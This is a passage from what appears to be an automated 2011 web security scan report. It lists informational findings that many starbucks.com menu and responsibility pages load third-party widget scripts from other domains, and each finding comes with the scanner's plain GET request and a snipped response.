Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:02:15 GMT
Connection: close
Content-Length: 38703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.251. http://www.starbucks.com/menu/food/salads/farmers-market-salad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/salads/farmers-market-salad

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/salads/farmers-market-salad HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:55:36 GMT
Connection: close
Content-Length: 41155

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.252. http://www.starbucks.com/menu/food/salads/fruit-cup  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/salads/fruit-cup

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/salads/fruit-cup HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:55:31 GMT
Connection: close
Content-Length: 40228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.253. http://www.starbucks.com/menu/food/salads/garden-pesto-salad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/salads/garden-pesto-salad

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/salads/garden-pesto-salad HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:55:37 GMT
Connection: close
Content-Length: 38406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.254. http://www.starbucks.com/menu/food/salads/picnic-pasta-salad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/salads/picnic-pasta-salad

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/salads/picnic-pasta-salad HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:55:53 GMT
Connection: close
Content-Length: 41163

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.255. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/chicken-santa-fe  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/sandwiches-panini-and-wraps/chicken-santa-fe

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/sandwiches-panini-and-wraps/chicken-santa-fe HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:56:13 GMT
Connection: close
Content-Length: 42573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.256. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/egg-salad-sandwich  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/sandwiches-panini-and-wraps/egg-salad-sandwich

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/sandwiches-panini-and-wraps/egg-salad-sandwich HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:56:38 GMT
Connection: close
Content-Length: 42100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.257. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/roasted-tomato-and-mozzarella  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/sandwiches-panini-and-wraps/roasted-tomato-and-mozzarella

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/sandwiches-panini-and-wraps/roasted-tomato-and-mozzarella HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:57:15 GMT
Connection: close
Content-Length: 42071

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.258. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/roasted-vegetable-panini  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/sandwiches-panini-and-wraps/roasted-vegetable-panini

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/sandwiches-panini-and-wraps/roasted-vegetable-panini HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:57:09 GMT
Connection: close
Content-Length: 42628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.259. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/tarragon-chicken-salad-sandwich  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/sandwiches-panini-and-wraps/tarragon-chicken-salad-sandwich

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/sandwiches-panini-and-wraps/tarragon-chicken-salad-sandwich HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:57:38 GMT
Connection: close
Content-Length: 43164

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.260. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/turkey-and-swiss-sandwich  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/sandwiches-panini-and-wraps/turkey-and-swiss-sandwich

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/sandwiches-panini-and-wraps/turkey-and-swiss-sandwich HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:58:02 GMT
Connection: close
Content-Length: 42289

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.261. http://www.starbucks.com/menu/food/yogurt/dark-cherry-yogurt-parfait  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/yogurt/dark-cherry-yogurt-parfait

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/yogurt/dark-cherry-yogurt-parfait HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:02:21 GMT
Connection: close
Content-Length: 41253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.262. http://www.starbucks.com/menu/food/yogurt/greek-yogurt-honey-parfait  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/yogurt/greek-yogurt-honey-parfait

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/yogurt/greek-yogurt-honey-parfait HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:02:30 GMT
Connection: close
Content-Length: 41009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.263. http://www.starbucks.com/menu/food/yogurt/strawberry-and-blueberry-yogurt-parfait  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/yogurt/strawberry-and-blueberry-yogurt-parfait

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/yogurt/strawberry-and-blueberry-yogurt-parfait HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:02:33 GMT
Connection: close
Content-Length: 41003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.264. http://www.starbucks.com/menu/nutrition  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/nutrition

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/nutrition HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:02:48 GMT
Connection: close
Content-Length: 49305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.265. http://www.starbucks.com/menu/nutrition/20-under-200  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/nutrition/20-under-200

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/nutrition/20-under-200 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:03:13 GMT
Connection: close
Content-Length: 38219

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.266. http://www.starbucks.com/menu/nutrition/35-under-350  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/nutrition/35-under-350

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/nutrition/35-under-350 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:03:35 GMT
Connection: close
Content-Length: 40754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.267. http://www.starbucks.com/responsibility  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /responsibility HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:10:24 GMT
Connection: close
Content-Length: 60638

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

           
           <script type="text/javascript" src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.268. http://www.starbucks.com/responsibility/community  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/community HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:10:28 GMT
Connection: close
Content-Length: 40282

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.269. http://www.starbucks.com/responsibility/community/community-service  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/community-service

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/community/community-service HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:10:50 GMT
Connection: close
Content-Length: 37367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.270. http://www.starbucks.com/responsibility/community/ethos-water-fund  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/ethos-water-fund

Issue detail

The response dynamically includes the following script from another domain:

Request

